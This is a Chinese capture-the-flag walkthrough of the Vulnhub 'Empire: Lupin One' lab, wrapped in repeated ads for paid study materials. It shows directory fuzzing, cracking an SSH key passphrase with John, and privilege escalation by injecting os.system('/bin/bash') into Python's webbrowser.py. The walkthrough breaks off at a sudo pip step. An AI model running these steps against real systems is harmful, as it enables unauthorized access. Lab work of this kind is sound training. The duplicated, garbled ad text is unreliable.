Vulnhub-Empire靶机-详细打靶流程，通用流行框架大全

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

[03:22:02] 403 - 278B - /.htpasswd_test
[03:22:02] 403 - 278B - /.htaccess.save
[03:22:02] 403 - 278B - /.htaccessOLD2
[03:22:02] 403 - 278B - /.htaccess_sc
[03:22:02] 403 - 278B - /.htpasswds
[03:22:02] 403 - 278B - /.httr-oauth
[03:22:02] 403 - 278B - /.htm
[03:22:36] 301 - 314B - /image -> http://192.168.0.133/image/
[03:22:38] 301 - 319B - /javascript -> http://192.168.0.133/javascript/
[03:22:42] 301 - 315B - /manual -> http://192.168.0.133/manual/
[03:22:42] 200 - 208B - /manual/index.html
[03:22:55] 200 - 34B - /robots.txt
[03:22:56] 403 - 278B - /server-status/
[03:22:56] 403 - 278B - /server-status

Task Completed

扫出robots.txt ，访问~myfiles目录，没有什么东西，这里通过其他的目录扫描工具，也没有扫到有用的信息

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/9ab43c9cfeab440b91b8ab0eef82e469.png)`访问~myfiles`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d214019e63c94f9ba3f653a2263f5012.png)


### 4.ffuf命令


`ffuf是一个用于Web应用程序的模糊测试工具，它可以快速、灵活地查找隐藏的内容、目录或文件`

-u:url
-x:输出高亮
-r：遵循重定向
-w: 字典

┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u “http://192.168.0.133/~FUZZ”

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v1.5.0 Kali Exclusive <3

---

:: Method : GET
:: URL : http://192.168.0.133/~FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500

---

secret [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 36ms]

`扫到secret目录，访问`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/169b202ca6e246c9babc3adce2ba1168.png)

你好朋友，我很高兴你找到了我的秘密目录，我创建了这样的与你分享我的创建SSH私钥文件， 它隐藏在这里的某个地方，这样黑客就不会找到它，也不会用快速通道破解我的密码。 我很聪明我知道。 有什么问题就告诉我 你最好的朋友icex64

告诉你要找到ssh密钥，且他的名字是icex64

#### 在这个目录下，继续使用ffuf工具扫描


`.mysecret.txt` 

┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u “http://192.168.0.133/~secret/.FUZZ” -e .txt,.bak,.html,.pub -mc 200

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v1.5.0 Kali Exclusive <3

---

:: Method : GET
:: URL : http://192.168.0.133/~secret/.FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Extensions : .txt .bak .html .pub
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200

---

directory-list-2.3-small.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 4ms]

#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

or send a letter to Creative Commons, 171 Second Street, .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

Copyright 2007 James Fisher.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

Copyright 2007 James Fisher [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

Attribution-Share Alike 3.0 License. To view a copy of this .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

Attribution-Share Alike 3.0 License. To view a copy of this .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

Attribution-Share Alike 3.0 License. To view a copy of this .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]

or send a letter to Creative Commons, 171 Second Street, .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 20ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]

#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]

#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

or send a letter to Creative Commons, 171 Second Street, .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]

#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]

This work is licensed under the Creative Commons .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]

directory-list-2.3-small.txt.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]

Attribution-Share Alike 3.0 License. To view a copy of this .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]

or send a letter to Creative Commons, 171 Second Street, .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

directory-list-2.3-small.txt.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 42ms]

This work is licensed under the Creative Commons .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]

Copyright 2007 James Fisher.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]

Copyright 2007 James Fisher.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 44ms]

directory-list-2.3-small.txt.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]

This work is licensed under the Creative Commons .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]

This work is licensed under the Creative Commons .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]

directory-list-2.3-small.txt.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]

Copyright 2007 James Fisher.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]

This work is licensed under the Creative Commons [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 50ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 51ms]

on atleast 3 different hosts [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]

on atleast 3 different hosts.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]

on atleast 3 different hosts.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]

Priority ordered case sensative list, where entries were found .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]

on atleast 3 different hosts.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

on atleast 3 different hosts.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 47ms]
mysecret.txt [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 56ms]
:: Progress: [438320/438320] :: Job [1/1] :: 938 req/sec :: Duration: [0:08:00] :: Errors: 0 ::

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ec64a7789e1d4bb0a31f03c2cc690972.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f382ca6e90bb469db2d7b0ca4f46159e.png)



> 
> base58解码，是一个ssh私钥
> 
> 
> 


### 5.ssh私钥爆破


#### 1.将私钥写进sh.txt中


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/eead79469a054160b3b43fb95154cdcf.png)


#### 2.将私钥转换为可以被john爆破的形式

┌──(root㉿kali)-[~]
└─# /usr/bin/ssh2john sh.txt > hash

#### 3.通过John爆破

这里我之前爆破过了

┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[~]
└─# john --show hash
sh.txt:P@55w0rd!

1 password hash cracked, 0 left

### 6.ssh私钥登陆

┌──(root㉿kali)-[~]
└─# ssh -i sh.txt icex64@192.168.0.133
Enter passphrase for key ‘sh.txt’:
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Wed Feb 7 00:46:39 2024 from 192.168.0.130
icex64@LupinOne:~$

### 7.icex64提权

sudo -l
看到一个py文件，arsene用户可以在没有passwd的环境下，使用heist.py，就想到在py中新启动一个arsene，shell环境

icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser

print (“Its not yet ready to get in action”)

webbrowser.open(“https://empirecybersecurity.co.mz”)

`heist.py文件中引用了webbrowser模块，找一下这个模块`

import webbrowser

print (“Its not yet ready to get in action”)

icex64@LupinOne:~$ find / -name webbrowser.py -type f 2>/dev/null
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$ head /usr/lib/python3.9/webbrowser.py

#! /usr/bin/env python3
“”“Interfaces for launching and remotely controlling Web browsers.”“”

Maintained by Georg Brandl.

import os
import shlex
import shutil
import sys
import subprocess

看到模块中引用了，os模块，想到通过os.system(“/bin/bash”),新启一个shell，将os.system(“/bin/bash”)加入到webbrowser.py中
使用vi编辑器

icex64@LupinOne:/tmp$ head -n 20 /usr/lib/python3.9/webbrowser.py

#! /usr/bin/env python3
“”“Interfaces for launching and remotely controlling Web browsers.”“”

Maintained by Georg Brandl.

import os
import shlex
import shutil
import sys
import subprocess
import threading

os.system(“/bin/bash”)
all = [“Error”, “open”, “open_new”, “open_new_tab”, “get”, “register”]

`加入完成后运行`

icex64@LupinOne:/tmp$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/tmp$ id
uid=1000(arsene) gid=1000(arsene) groups=1000(arsene),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

成功到arsene用户

### 8.arsene提权


`pip提权`  
 [**https://gtfobins.github.io/gtfobins/pip/**]( )

arsene@LupinOne:/tmp$ sudo -l
Matching Defaults entries for arsene on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User arsene may run the following commands on LupinOne:
(root) NOPASSWD: /usr/bin/pip

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话，可以联系领取~

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

2️⃣视频配套工具&国内外网安书籍、文档

① 工具

② 视频

③ 书籍

资源较为敏感，未展示全面，需要的最下面获取

② 简历模板

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)

② 简历模板

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）
[外链图片转存中…(img-dLW897Xu-1713418663929)]

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！